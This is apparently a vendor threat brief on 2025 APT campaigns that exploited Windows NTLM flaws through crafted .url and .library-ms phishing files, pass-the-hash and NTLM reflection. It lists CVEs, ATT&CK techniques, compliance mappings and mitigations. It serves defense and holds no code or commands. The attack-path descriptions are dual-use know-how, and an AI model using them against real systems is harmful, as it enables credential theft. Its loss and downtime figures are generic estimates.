Old Tech, New Headaches: How 2025’s NTLM Vulnerabilities Fueled Global APT Attacks
Executive Summary
In 2025, a wave of advanced persistent threat campaigns exploited persistent vulnerabilities in Microsoft NTLM authentication, impacting organizations across Latin America, Russia, and Central Asia. Attackers such as BlindEagle and Head Mare leveraged newly disclosed Windows flaws (including CVE-2024-43451, CVE-2025-24054, and CVE-2025-33073) to harvest NTLM password hashes via crafted files and phishing emails, enabling credential theft, privilege escalation, and remote malware deployment. High-profile incidents included Remcos RAT and AveMaria Trojan infections following targeted spear-phishing, widespread lateral movement using pass-the-hash techniques, and the abuse of man-in-the-middle and reflection vulnerabilities to gain SYSTEM-level access.
These incidents underscore the urgent risks posed by legacy protocols—despite announced NTLM deprecation, its widespread legacy use enables cybercriminals to refine credential relay and privilege escalation tactics. The ongoing threat highlights the necessity for rapid protocol retirement, proactive device auditing, regular patching, and adopting stronger authentication frameworks to defend against evolving identity-driven attacks.
Why This Matters Now
The spike in NTLM-focused attacks and fresh CVEs in 2024–2025 prove legacy authentication remains a major enterprise risk. As attackers rapidly weaponize new exploits and combine credential theft with malware delivery, organizations face escalating pressure to remove NTLM from production, enhance lateral movement detection, and close compliance gaps before attackers exploit them.
Attack Path Analysis
The attack begins with phishing emails delivering malicious .url or .library-ms files that exploit NTLM authentication flaws, resulting in initial compromise via credential leakage or remote payload execution. Attackers then escalate privileges by capturing NTLM hashes and leveraging vulnerabilities like NTLM reflection to gain SYSTEM-level access or extract credentials from LSASS memory. They proceed to lateral movement within the network using pass-the-hash, Impacket tools, or stolen tokens to access other systems. Once established, remote access Trojans communicate with attacker-controlled infrastructure for command and control. Data and credentials are exfiltrated using native protocols or downloaded malware modules, and the attack culminates in malware deployment (such as Remcos RAT or PhantomCore), cryptocurrency theft, or establishing persistence for future impact.
Kill Chain Progression
Initial Compromise
Description
Phishing emails containing crafted .url or .library-ms files exploit NTLM flaws, resulting in either the download and execution of RATs (e.g., Remcos, AveMaria) or silent NTLM hash leakage to attacker-controlled servers.
Related CVEs
CVE-2024-43451
CVSS 6.5A vulnerability in Microsoft Windows allows NTLMv2 hash disclosure via specially crafted .url files, potentially leading to credential compromise.
Affected Products:
Microsoft Windows – Multiple Versions
Exploit Status:
exploited in the wildCVE-2025-24054
CVSS 6.5A vulnerability in Microsoft Windows allows NTLMv2 hash disclosure via malicious .library-ms files, potentially leading to credential compromise.
Affected Products:
Microsoft Windows – Multiple Versions
Exploit Status:
exploited in the wildCVE-2025-24071
CVSS 6.5A vulnerability in Microsoft Windows allows NTLMv2 hash disclosure via malicious .library-ms files, potentially leading to credential compromise.
Affected Products:
Microsoft Windows – Multiple Versions
Exploit Status:
exploited in the wildCVE-2025-33073
CVSS 7.5A vulnerability in Microsoft Windows SMB client allows NTLM reflection attacks, potentially leading to privilege escalation to SYSTEM level.
Affected Products:
Microsoft Windows – Multiple Versions
Exploit Status:
exploited in the wild
MITRE ATT&CK® Techniques
Phishing: Spearphishing Attachment
Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay
Brute Force: Pass the Hash
Forced Authentication
Valid Accounts
OS Credential Dumping: LSASS Memory
Lateral Tool Transfer
Application Layer Protocol: Web Protocols
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Authentication Vulnerability Management
Control ID: 8.2.2
NYDFS 23 NYCRR 500 – Risk Assessment and Access Privileges
Control ID: 500.03/06/14
DORA (Digital Operational Resilience Act) – ICT Risk Management and Protection
Control ID: Art. 9(2), Art. 10(1)
CISA Zero Trust Maturity Model 2.0 – Phasing Out Legacy Authentication Protocols
Control ID: Identity Pillar: Authentication Protection
NIS2 Directive – Technical and Organizational Measures: Access Control
Control ID: Art. 21(2), Annex I(2)(c)
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Financial Services
NTLM credential harvesting attacks directly threaten banking systems with lateral movement, privilege escalation, and compliance violations across HIPAA/PCI requirements.
Banking/Mortgage
APT groups exploiting NTLM vulnerabilities can compromise authentication systems, enabling unauthorized access to financial data and regulatory compliance failures.
Government Administration
State-sponsored attacks targeting government entities through NTLM relay exploits enable privileged access escalation and sensitive information exfiltration capabilities.
Health Care / Life Sciences
NTLM authentication vulnerabilities expose patient data systems to credential theft, violating HIPAA requirements and enabling healthcare network compromise.
Sources
- Old tech, new vulnerabilities: NTLM abuse, ongoing exploitation in 2025https://securelist.com/ntlm-abuse-in-2025/118132/Verified
- CVE-2025-24054, NTLM Exploit in the Wildhttps://research.checkpoint.com/2025/cve-2025-24054-ntlm-exploit-in-the-wild/Verified
- CISA Warns of Actively Exploited Windows NTLM Vulnerabilityhttps://cyberpress.org/cisa-warns-windows-ntlm/Verified
- Microsoft’s guidance to help mitigate critical threats to Active Directory Domain Services in 2025https://www.microsoft.com/en-us/windows-server/blog/2025/12/09/microsofts-guidance-to-help-mitigate-critical-threats-to-active-directory-domain-services-in-2025Verified
Frequently Asked Questions
Cloud Native Security Fabric Mitigations and ControlsCNSF
Integrated Zero Trust segmentation, east-west traffic monitoring, policy-based egress controls, and network-layer encryption would have constrained NTLM attack paths, limiting credential theft, lateral movement, and data exfiltration while improving detection and rapid response.
Control: Cloud Firewall (ACF)
Mitigation: Malicious inbound file hosting and C2 domains can be blocked, reducing initial malware infections.
Control: Zero Trust Segmentation
Mitigation: Network segmentation restricts abuse of legacy protocols and sensitive targets even with compromised hashes.
Control: East-West Traffic Security
Mitigation: Lateral movement paths between workloads are tightly controlled, preventing unauthorized pivots.
Control: Egress Security & Policy Enforcement
Mitigation: Outbound C2 communications to unapproved domains/IPs are denied or alerted.
Control: Encrypted Traffic (HPE)
Mitigation: Sensitive data in motion is encrypted, and anomalous unencrypted egress can be flagged.
Rapid detection of covert tools and abnormal behaviors enables faster incident response.
Impact at a Glance
Affected Business Functions
- Authentication Services
- Network Security
- User Access Management
Estimated downtime: 5 days
Estimated loss: $500,000
Potential exposure of user credentials, leading to unauthorized access and data breaches.
Recommended Actions
Key Takeaways & Next Steps
- • Accelerate full NTLM deprecation and enforce strong identity governance to eliminate legacy authentication risks.
- • Apply Zero Trust segmentation and east-west policy controls to prevent credential replay and lateral movement, especially around sensitive systems.
- • Deploy strict cloud egress filtering and cloud firewalling to intercept malicious outbound communications and C2 activity.
- • Enhance encrypted traffic enforcement and monitor for any anomalous unencrypted traffic, especially SMB/WebDAV flows.
- • Integrate network-centric threat detection and baselining to rapidly identify and respond to credential misuse, malware drop, and persistence mechanisms.
